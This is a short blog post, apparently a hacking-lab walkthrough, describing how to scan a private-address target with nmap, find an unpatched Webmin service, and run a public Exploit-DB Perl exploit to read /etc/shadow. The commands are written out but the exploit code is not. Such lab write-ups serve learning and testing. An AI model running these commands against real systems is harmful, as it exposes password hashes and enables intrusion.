Senin, 30 Januari 2012

PRIVILEGE ESCALATION 

1. information Gethring with victim ip 192.168.0.21
2. Service Enumeration 
     with use nmap -sV 192.168.0.21


above we can see what ports are open
and we tried to open port 10000 in the browser by typing 192.168.0.21:10000

3. Vulnerability assesment with exploitDB
     you can see from the last scan open ports 10000, htttp service and version wbmin
   your open exploitDB 
   after you type ./searchsploit webmin
   and you select the one that is suitable for use
   Exmp webmin which path /multiple/remote2017.pl
   with type pearl platform/multiple/remote2017.pl

and you see command 
with command platforms/multiple/remote/2017.pl <url> <port> <filename> <target>
after you type perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0


Tidak ada komentar:

Posting Komentar